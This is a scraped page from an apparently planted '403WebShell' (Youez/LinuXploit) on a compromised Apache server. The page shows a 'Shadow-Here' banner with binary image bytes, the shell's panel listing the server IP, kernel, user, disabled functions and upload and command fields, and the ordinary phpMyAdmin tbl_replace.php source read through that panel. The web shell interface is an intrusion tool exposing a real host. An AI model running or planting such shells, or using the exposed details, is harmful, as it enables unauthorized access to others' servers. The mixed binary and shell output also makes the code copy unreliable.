....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îŠ‡y’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒwŽ¼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9u鶳ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•â•ªVêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•î¦ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄÍ°L–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýc塶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ŠBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊƃZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
403Webshell
Server IP : 195.3.193.33  /  Your IP : 216.73.216.125
Web Server : Apache
System : Linux server3 5.10.0-35-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : web032 ( 1035)
PHP Version : 7.3.33
Disable Function : show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, disk_total_space, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/phpmyadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/share/phpmyadmin/tbl_replace.php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Manipulation of table data like inserting, replacing and updating
 *
 * Usually called as form action from tbl_change.php to insert or update table rows
 *
 * @todo 'edit_next' tends to not work as expected if used ...
 * at least there is no order by it needs the original query
 * and the row number and than replace the LIMIT clause
 *
 * @package PhpMyAdmin
 */
declare(strict_types=1);

use PhpMyAdmin\Core;
use PhpMyAdmin\DatabaseInterface;
use PhpMyAdmin\File;
use PhpMyAdmin\InsertEdit;
use PhpMyAdmin\Message;
use PhpMyAdmin\Plugins\IOTransformationsPlugin;
use PhpMyAdmin\Relation;
use PhpMyAdmin\Response;
use PhpMyAdmin\Table;
use PhpMyAdmin\Transformations;
use PhpMyAdmin\Util;

if (! defined('ROOT_PATH')) {
    define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR);
}

global $containerBuilder, $db, $table, $url_params;

require_once ROOT_PATH . 'libraries/common.inc.php';

/** @var Response $response */
$response = $containerBuilder->get(Response::class);

/** @var DatabaseInterface $dbi */
$dbi = $containerBuilder->get(DatabaseInterface::class);

// Check parameters
Util::checkParameters(['db', 'table', 'goto']);

$dbi->selectDb($db);

/**
 * Initializes some variables
 */
$goto_include = false;

$header = $response->getHeader();
$scripts = $header->getScripts();
$scripts->addFile('makegrid.js');
// Needed for generation of Inline Edit anchors
$scripts->addFile('vendor/stickyfill.min.js');
$scripts->addFile('sql.js');
$scripts->addFile('indexes.js');
$scripts->addFile('gis_data_editor.js');

/** @var Relation $relation */
$relation = $containerBuilder->get('relation');
/** @var Transformations $transformations */
$transformations = $containerBuilder->get('transformations');
/** @var InsertEdit $insertEdit */
$insertEdit = $containerBuilder->get('insert_edit');

// check whether insert row mode, if so include tbl_change.php
$insertEdit->isInsertRow();

$after_insert_actions = [
    'new_insert',
    'same_insert',
    'edit_next',
];
if (isset($_POST['after_insert'])
    && in_array($_POST['after_insert'], $after_insert_actions)
) {
    $url_params['after_insert'] = $_POST['after_insert'];
    if (isset($_POST['where_clause'])) {
        foreach ($_POST['where_clause'] as $one_where_clause) {
            if ($_POST['after_insert'] == 'same_insert') {
                $url_params['where_clause'][] = $one_where_clause;
            } elseif ($_POST['after_insert'] == 'edit_next') {
                $insertEdit->setSessionForEditNext($one_where_clause);
            }
        }
    }
}
//get $goto_include for different cases
$goto_include = $insertEdit->getGotoInclude($goto_include);

// Defines the url to return in case of failure of the query
$err_url = $insertEdit->getErrorUrl($url_params);

/**
 * Prepares the update/insert of a row
 */
list($loop_array, $using_key, $is_insert, $is_insertignore)
    = $insertEdit->getParamsForUpdateOrInsert();

$query = [];
$value_sets = [];
$func_no_param = [
    'CONNECTION_ID',
    'CURRENT_USER',
    'CURDATE',
    'CURTIME',
    'CURRENT_DATE',
    'CURRENT_TIME',
    'DATABASE',
    'LAST_INSERT_ID',
    'NOW',
    'PI',
    'RAND',
    'SYSDATE',
    'UNIX_TIMESTAMP',
    'USER',
    'UTC_DATE',
    'UTC_TIME',
    'UTC_TIMESTAMP',
    'UUID',
    'UUID_SHORT',
    'VERSION',
];
$func_optional_param = [
    'RAND',
    'UNIX_TIMESTAMP',
];

$gis_from_text_functions = [
    'GeomFromText',
    'GeomCollFromText',
    'LineFromText',
    'MLineFromText',
    'PointFromText',
    'MPointFromText',
    'PolyFromText',
    'MPolyFromText',
];

$gis_from_wkb_functions = [];
if ($dbi->getVersion() >= 50600) {
    $gis_from_wkb_functions = [
        'ST_GeomFromText',
        'ST_GeomCollFromText',
        'ST_LineFromText',
        'ST_MLineFromText',
        'ST_PointFromText',
        'ST_MPointFromText',
        'ST_PolyFromText',
        'ST_MPolyFromText',
    ];
}

//if some posted fields need to be transformed.
$mime_map = $transformations->getMime($db, $table);
if ($mime_map === false) {
    $mime_map = [];
}

$query_fields = [];
$insert_errors = [];
$row_skipped = false;
$unsaved_values = [];
foreach ($loop_array as $rownumber => $where_clause) {
    // skip fields to be ignored
    if (! $using_key && isset($_POST['insert_ignore_' . $where_clause])) {
        continue;
    }

    // Defines the SET part of the sql query
    $query_values = [];

    // Map multi-edit keys to single-level arrays, dependent on how we got the fields
    $multi_edit_columns
        = isset($_POST['fields']['multi_edit'][$rownumber])
        ? $_POST['fields']['multi_edit'][$rownumber]
        : [];
    $multi_edit_columns_name
        = isset($_POST['fields_name']['multi_edit'][$rownumber])
        ? $_POST['fields_name']['multi_edit'][$rownumber]
        : [];
    $multi_edit_columns_prev
        = isset($_POST['fields_prev']['multi_edit'][$rownumber])
        ? $_POST['fields_prev']['multi_edit'][$rownumber]
        : null;
    $multi_edit_funcs
        = isset($_POST['funcs']['multi_edit'][$rownumber])
        ? $_POST['funcs']['multi_edit'][$rownumber]
        : null;
    $multi_edit_salt
        = isset($_POST['salt']['multi_edit'][$rownumber])
        ? $_POST['salt']['multi_edit'][$rownumber]
        : null;
    $multi_edit_columns_type
        = isset($_POST['fields_type']['multi_edit'][$rownumber])
        ? $_POST['fields_type']['multi_edit'][$rownumber]
        : null;
    $multi_edit_columns_null
        = isset($_POST['fields_null']['multi_edit'][$rownumber])
        ? $_POST['fields_null']['multi_edit'][$rownumber]
        : null;
    $multi_edit_columns_null_prev
        = isset($_POST['fields_null_prev']['multi_edit'][$rownumber])
        ? $_POST['fields_null_prev']['multi_edit'][$rownumber]
        : null;
    $multi_edit_auto_increment
        = isset($_POST['auto_increment']['multi_edit'][$rownumber])
        ? $_POST['auto_increment']['multi_edit'][$rownumber]
        : null;
    $multi_edit_virtual
        = isset($_POST['virtual']['multi_edit'][$rownumber])
        ? $_POST['virtual']['multi_edit'][$rownumber]
        : null;

    // When a select field is nullified, it's not present in $_POST
    // so initialize it; this way, the foreach($multi_edit_columns) will process it
    foreach ($multi_edit_columns_name as $key => $val) {
        if (! isset($multi_edit_columns[$key])) {
            $multi_edit_columns[$key] = '';
        }
    }

    // Iterate in the order of $multi_edit_columns_name,
    // not $multi_edit_columns, to avoid problems
    // when inserting multiple entries
    $insert_fail = false;
    foreach ($multi_edit_columns_name as $key => $column_name) {
        $current_value = $multi_edit_columns[$key];
        // Note: $key is an md5 of the fieldname. The actual fieldname is
        // available in $multi_edit_columns_name[$key]

        $file_to_insert = new File();
        $file_to_insert->checkTblChangeForm((string) $key, (string) $rownumber);

        $possibly_uploaded_val = $file_to_insert->getContent();
        if ($possibly_uploaded_val !== false) {
            $current_value = $possibly_uploaded_val;
        }
        // Apply Input Transformation if defined
        if (! empty($mime_map[$column_name])
            && ! empty($mime_map[$column_name]['input_transformation'])
        ) {
            $filename = 'libraries/classes/Plugins/Transformations/'
                . $mime_map[$column_name]['input_transformation'];
            if (is_file($filename)) {
                $classname = $transformations->getClassName($filename);
                if (class_exists($classname)) {
                    /** @var IOTransformationsPlugin $transformation_plugin */
                    $transformation_plugin = new $classname();
                    $transformation_options = $transformations->getOptions(
                        $mime_map[$column_name]['input_transformation_options']
                    );
                    $current_value = $transformation_plugin->applyTransformation(
                        $current_value,
                        $transformation_options
                    );
                    // check if transformation was successful or not
                    // and accordingly set error messages & insert_fail
                    if (method_exists($transformation_plugin, 'isSuccess')
                        && ! $transformation_plugin->isSuccess()
                    ) {
                        $insert_fail = true;
                        $row_skipped = true;
                        $insert_errors[] = sprintf(
                            __('Row: %1$s, Column: %2$s, Error: %3$s'),
                            $rownumber,
                            $column_name,
                            $transformation_plugin->getError()
                        );
                    }
                }
            }
        }

        if ($file_to_insert->isError()) {
            $insert_errors[] = $file_to_insert->getError();
        }
        // delete $file_to_insert temporary variable
        $file_to_insert->cleanUp();

        $current_value = $insertEdit->getCurrentValueForDifferentTypes(
            $possibly_uploaded_val,
            $key,
            $multi_edit_columns_type,
            $current_value,
            $multi_edit_auto_increment,
            $rownumber,
            $multi_edit_columns_name,
            $multi_edit_columns_null,
            $multi_edit_columns_null_prev,
            $is_insert,
            $using_key,
            $where_clause,
            $table,
            $multi_edit_funcs
        );

        $current_value_as_an_array = $insertEdit->getCurrentValueAsAnArrayForMultipleEdit(
            $multi_edit_funcs,
            $multi_edit_salt,
            $gis_from_text_functions,
            $current_value,
            $gis_from_wkb_functions,
            $func_optional_param,
            $func_no_param,
            $key
        );

        if (! isset($multi_edit_virtual) || ! isset($multi_edit_virtual[$key])) {
            list($query_values, $query_fields)
                = $insertEdit->getQueryValuesForInsertAndUpdateInMultipleEdit(
                    $multi_edit_columns_name,
                    $multi_edit_columns_null,
                    $current_value,
                    $multi_edit_columns_prev,
                    $multi_edit_funcs,
                    $is_insert,
                    $query_values,
                    $query_fields,
                    $current_value_as_an_array,
                    $value_sets,
                    $key,
                    $multi_edit_columns_null_prev
                );
        }
        if (isset($multi_edit_columns_null[$key])) {
            $multi_edit_columns[$key] = null;
        }
    } //end of foreach

    // temporarily store rows not inserted
    // so that they can be populated again.
    if ($insert_fail) {
        $unsaved_values[$rownumber] = $multi_edit_columns;
    }
    if (! $insert_fail && count($query_values) > 0) {
        if ($is_insert) {
            $value_sets[] = implode(', ', $query_values);
        } else {
            // build update query
            $query[] = 'UPDATE ' . Util::backquote($table)
                . ' SET ' . implode(', ', $query_values)
                . ' WHERE ' . $where_clause
                . ($_POST['clause_is_unique'] ? '' : ' LIMIT 1');
        }
    }
} // end foreach ($loop_array as $where_clause)
unset(
    $multi_edit_columns_name,
    $multi_edit_columns_prev,
    $multi_edit_funcs,
    $multi_edit_columns_type,
    $multi_edit_columns_null,
    $func_no_param,
    $multi_edit_auto_increment,
    $current_value_as_an_array,
    $key,
    $current_value,
    $loop_array,
    $where_clause,
    $using_key,
    $multi_edit_columns_null_prev,
    $insert_fail
);

// Builds the sql query
if ($is_insert && count($value_sets) > 0) {
    $query = $insertEdit->buildSqlQuery($is_insertignore, $query_fields, $value_sets);
} elseif (empty($query) && ! isset($_POST['preview_sql']) && ! $row_skipped) {
    // No change -> move back to the calling script
    //
    // Note: logic passes here for inline edit
    $message = Message::success(__('No change'));
    // Avoid infinite recursion
    if ($goto_include == 'tbl_replace.php') {
        $goto_include = 'tbl_change.php';
    }
    $active_page = $goto_include;
    include ROOT_PATH . Core::securePath($goto_include);
    exit;
}
unset($multi_edit_columns, $is_insertignore);

// If there is a request for SQL previewing.
if (isset($_POST['preview_sql'])) {
    Core::previewSQL($query);
}

/**
 * Executes the sql query and get the result, then move back to the calling
 * page
 */
list ($url_params, $total_affected_rows, $last_messages, $warning_messages,
    $error_messages, $return_to_sql_query)
        = $insertEdit->executeSqlQuery($url_params, $query);

if ($is_insert && (count($value_sets) > 0 || $row_skipped)) {
    $message = Message::getMessageForInsertedRows(
        $total_affected_rows
    );
    $unsaved_values = array_values($unsaved_values);
} else {
    $message = Message::getMessageForAffectedRows(
        $total_affected_rows
    );
}
if ($row_skipped) {
    $goto_include = 'tbl_change.php';
    $message->addMessagesString($insert_errors, '<br>');
    $message->isError(true);
}

$message->addMessages($last_messages, '<br>');

if (! empty($warning_messages)) {
    $message->addMessagesString($warning_messages, '<br>');
    $message->isError(true);
}
if (! empty($error_messages)) {
    $message->addMessagesString($error_messages);
    $message->isError(true);
}
unset(
    $error_messages,
    $warning_messages,
    $total_affected_rows,
    $last_messages,
    $last_message,
    $row_skipped,
    $insert_errors
);

/**
 * The following section only applies to grid editing.
 * However, verifying isAjax() is not enough to ensure we are coming from
 * grid editing. If we are coming from the Edit or Copy link in Browse mode,
 * ajax_page_request is present in the POST parameters.
 */
if ($response->isAjax() && ! isset($_POST['ajax_page_request'])) {
    /**
     * If we are in grid editing, we need to process the relational and
     * transformed fields, if they were edited. After that, output the correct
     * link/transformed value and exit
     */
    if (isset($_POST['rel_fields_list']) && $_POST['rel_fields_list'] != '') {
        $map = $relation->getForeigners($db, $table, '', 'both');

        $relation_fields = [];
        parse_str($_POST['rel_fields_list'], $relation_fields);

        // loop for each relation cell
        /** @var array $relation_fields */
        foreach ($relation_fields as $cell_index => $curr_rel_field) {
            foreach ($curr_rel_field as $relation_field => $relation_field_value) {
                $where_comparison = "='" . $relation_field_value . "'";
                $dispval = $insertEdit->getDisplayValueForForeignTableColumn(
                    $where_comparison,
                    $map,
                    $relation_field
                );

                $extra_data['relations'][$cell_index]
                    = $insertEdit->getLinkForRelationalDisplayField(
                        $map,
                        $relation_field,
                        $where_comparison,
                        $dispval,
                        $relation_field_value
                    );
            }
        }   // end of loop for each relation cell
    }
    if (isset($_POST['do_transformations'])
        && $_POST['do_transformations'] == true
    ) {
        $edited_values = [];
        parse_str($_POST['transform_fields_list'], $edited_values);

        if (! isset($extra_data)) {
            $extra_data = [];
        }
        $transformation_types = [
            "input_transformation",
            "transformation",
        ];
        foreach ($mime_map as $transformation) {
            $column_name = $transformation['column_name'];
            foreach ($transformation_types as $type) {
                $file = Core::securePath($transformation[$type]);
                $extra_data = $insertEdit->transformEditedValues(
                    $db,
                    $table,
                    $transformation,
                    $edited_values,
                    $file,
                    $column_name,
                    $extra_data,
                    $type
                );
            }
        }   // end of loop for each $mime_map
    }

    // Need to check the inline edited value can be truncated by MySQL
    // without informing while saving
    $column_name = $_POST['fields_name']['multi_edit'][0][0];

    $insertEdit->verifyWhetherValueCanBeTruncatedAndAppendExtraData(
        $db,
        $table,
        $column_name,
        $extra_data
    );

    /**Get the total row count of the table*/
    $_table = new Table($_POST['table'], $_POST['db']);
    $extra_data['row_count'] = $_table->countRecords();

    $extra_data['sql_query'] = Util::getMessage(
        $message,
        $GLOBALS['display_query']
    );

    $response->setRequestStatus($message->isSuccess());
    $response->addJSON('message', $message);
    $response->addJSON($extra_data);
    exit;
}

if (! empty($return_to_sql_query)) {
    $disp_query = $GLOBALS['sql_query'];
    $disp_message = $message;
    unset($message);
    $GLOBALS['sql_query'] = $return_to_sql_query;
}

$scripts->addFile('vendor/jquery/additional-methods.js');
$scripts->addFile('table/change.js');

$active_page = $goto_include;

/**
 * If user asked for "and then Insert another new row" we have to remove
 * WHERE clause information so that tbl_change.php does not go back
 * to the current record
 */
if (isset($_POST['after_insert']) && 'new_insert' == $_POST['after_insert']) {
    unset($_POST['where_clause']);
}

/**
 * Load target page.
 */
require ROOT_PATH . Core::securePath($goto_include);
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit